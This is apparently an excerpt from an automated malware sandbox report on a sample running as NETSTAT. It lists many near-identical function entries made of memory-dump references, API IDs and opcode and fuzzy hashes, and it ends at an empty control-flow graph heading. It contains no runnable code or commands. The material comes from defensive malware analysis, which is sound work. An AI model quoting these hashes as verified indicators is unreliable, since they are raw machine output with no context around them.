                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 16438b44b275c9976e4716856ae0e69e9a9a3046ef102e8abef346e4b69bb212
                                                      • Instruction ID: 113ec79b63d113b1f425b94705ac14f2529833ce4dffeca55a3199b7ec4d32b3
                                                      • Opcode Fuzzy Hash: 16438b44b275c9976e4716856ae0e69e9a9a3046ef102e8abef346e4b69bb212
                                                      • Instruction Fuzzy Hash: C6E0467A2012047BCA20FA59DC01FDB77ACDFC9764F408459FA08AB241C774BA4186E4
                                                      Function 03934340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                      • Instruction ID: 00b697b3417dd74e0bf95109ca0d8c4ac07c7e1c85739c882d52e16923c875e0
                                                      • Opcode Fuzzy Hash: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                      • Instruction Fuzzy Hash: 2490023160990412A140B1584898946404997E0301B55C011E0424554C8B558A565361
                                                      Function 03934650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                      • Instruction ID: 071c25e6e6e696cbf06b1d04839d0248360b4f19c6547838f646a8b066474913
                                                      • Opcode Fuzzy Hash: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                      • Instruction Fuzzy Hash: 56900261605604425140B1584818806604997E1301395C115E0554560C875989559369
                                                      Function 03932BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                      • Instruction ID: ab7194a2acf3d615906986d39479fd5b2bd464d25c01ec18b8f109d475a0fc58
                                                      • Opcode Fuzzy Hash: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                      • Instruction Fuzzy Hash: 0490023160950C02E150B1584428B46004987D0301F55C011E0024654D87968B5577A1
                                                      Function 03932BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                      • Instruction ID: ba5173fb01be06699076b89bafdc9949885677a42d2b4041bef8ea93a2580b05
                                                      • Opcode Fuzzy Hash: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                      • Instruction Fuzzy Hash: 9F90023120550C02E180B1584418A4A004987D1301F95C015E0025654DCB568B5977A1
                                                      Function 03932BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                      • Instruction ID: 09aa2b58da5100a06c4d0bbf31caf1d3b0347e05125ddf624cc974b40c8af49a
                                                      • Opcode Fuzzy Hash: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                      • Instruction Fuzzy Hash: 4790023120954C42E140B1584418E46005987D0305F55C011E0064694D97668E55B761
                                                      Function 03932B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                      • Instruction ID: dce561f7d4a38ba3f7003e70b45de958e4bad780b40a988f708e06cf5a49f07a
                                                      • Opcode Fuzzy Hash: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                      • Instruction Fuzzy Hash: 9B900261206504035105B1584428A16404E87E0201B55C021E1014590DC66689916225
                                                      Function 03932AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                      • Instruction ID: b3d3959fe93c6281ae7fd06fcd410188bc34b19220ae16e50c6f03d21c61dd90
                                                      • Opcode Fuzzy Hash: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                      • Instruction Fuzzy Hash: 3E900435315504031105F55C071CD0700CFC7D5351355C031F1015550CD773CD715331
                                                      Function 03932AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                      • Instruction ID: e7d3dcbb9dff8109d5b77cb91799384e26efbbd368afc7e05df0448f0ea7e9eb
                                                      • Opcode Fuzzy Hash: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                      • Instruction Fuzzy Hash: 18900225225504021145F558061890B048997D6351395C015F1416590CC76289655321
                                                      Function 03932FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                      • Instruction ID: cac63d534eb0c682d7eb4e7c36e6e7945f2a5836108b3edad2808207d4f19c9a
                                                      • Opcode Fuzzy Hash: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                      • Instruction Fuzzy Hash: E2900221605504425140B1688858D064049ABE1211755C121E0998550D869A89655765
                                                      Function 03932FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                      • Instruction ID: a7ffa00478660fcf416fe169745c48bb608cca0e8fcb500fe4bce194018ead2f
                                                      • Opcode Fuzzy Hash: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                      • Instruction Fuzzy Hash: 51900221215D0442E200B5684C28F07004987D0303F55C115E0154554CCA5689615621
                                                      Function 03932F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                      • Instruction ID: 4634d928edb80c507da2a510888a7ad114c6b70419b4c4f8648e91ffa4c604de
                                                      • Opcode Fuzzy Hash: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                      • Instruction Fuzzy Hash: 2890026134550842E100B1584428F060049C7E1301F55C015E1064554D875ACD526226
                                                      Function 03932E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                      • Instruction ID: d61c35260e4ae7ee59d24c7678558a597342336f498a9b763353f53ba785a562
                                                      • Opcode Fuzzy Hash: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                      • Instruction Fuzzy Hash: 0590022160550902E101B1584418A16004E87D0241F95C022E1024555ECB668A92A231
                                                      Function 03932EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                      • Instruction ID: cdc359fb419f31ede06ec35bf55b977a984cd7dccc9e5fe65c82af83c17d1306
                                                      • Opcode Fuzzy Hash: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                      • Instruction Fuzzy Hash: BF90026120590803E140B5584818A07004987D0302F55C011E2064555E8B6A8D516235
                                                      Function 03932DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                      • Instruction ID: 0049fd52dbc39495122bdf08b76650b3d3ffb2bb183a6f942458c708b0caaf84
                                                      • Opcode Fuzzy Hash: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                      • Instruction Fuzzy Hash: 3F900221246545526545F1584418907404A97E0241795C012E1414950C86679956D721
                                                      Function 03932DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                      • Instruction ID: d6a55aa4b4b60a4bc1483da3ac20d7fd618ceb2b2da3ba1e13018dcd360c9c6c
                                                      • Opcode Fuzzy Hash: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                      • Instruction Fuzzy Hash: 5890023120550813E111B1584518B07004D87D0241F95C412E0424558D97978A52A221
                                                      Function 03932D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                      • Instruction ID: af1a02e22924812977476bb0c2aae43e28e92c2176a4e06d2af289e133af31e8
                                                      • Opcode Fuzzy Hash: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                      • Instruction Fuzzy Hash: 7B90022921750402E180B158541CA0A004987D1202F95D415E0015558CCA5689695321
                                                      Function 03932D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                      • Instruction ID: e3aff0bee90bf05031d8ad9230dc96257f8e499e2323c346cf2ed464f9a4023d
                                                      • Opcode Fuzzy Hash: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                      • Instruction Fuzzy Hash: 3690022130550403E140B158542CA064049D7E1301F55D011E0414554CDA5689565322
                                                      Function 03932CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                      • Instruction ID: 27e948ba4c3b553fc8cb9ee2978f4e6b61da8d50f99a38ba449d59527a6f87e1
                                                      • Opcode Fuzzy Hash: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                      • Instruction Fuzzy Hash: 6A90023120550802E100B598541CA46004987E0301F55D011E5024555EC7A689916231
                                                      Function 03932C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                      • Instruction ID: 98172ed4f2815d0427bf654bb5cfab9b62ea8356319cb310a722b5972f1a69c8
                                                      • Opcode Fuzzy Hash: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                      • Instruction Fuzzy Hash: 0590023120558C02E110B1588418B4A004987D0301F59C411E4424658D87D689917221
                                                      Function 03932C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                      • Instruction ID: f6290172e3e94e25e6b5e036ab7bbd1c516736702c71da16ba6ec2b21ab93038
                                                      • Opcode Fuzzy Hash: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                      • Instruction Fuzzy Hash: 8890023120550C42E100B1584418F46004987E0301F55C016E0124654D8756C9517621
                                                      Function 039335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                      • Instruction ID: 3963b5324cbc31f56a9c98aaf5695fdabb434fa984d88ada361499a0d93a24e7
                                                      • Opcode Fuzzy Hash: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                      • Instruction Fuzzy Hash: 1690023160960802E100B1584528B06104987D0201F65C411E0424568D87D68A5166A2
                                                      Function 039339B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                      • Instruction ID: 589c0370722e23713c11ead713f0e3533cf07478b06ad497c0608540c44abedc
                                                      • Opcode Fuzzy Hash: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                      • Instruction Fuzzy Hash: E590022124955502E150B15C4418A164049A7E0201F55C021E0814594D869689556321
                                                      Function 03063C60 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
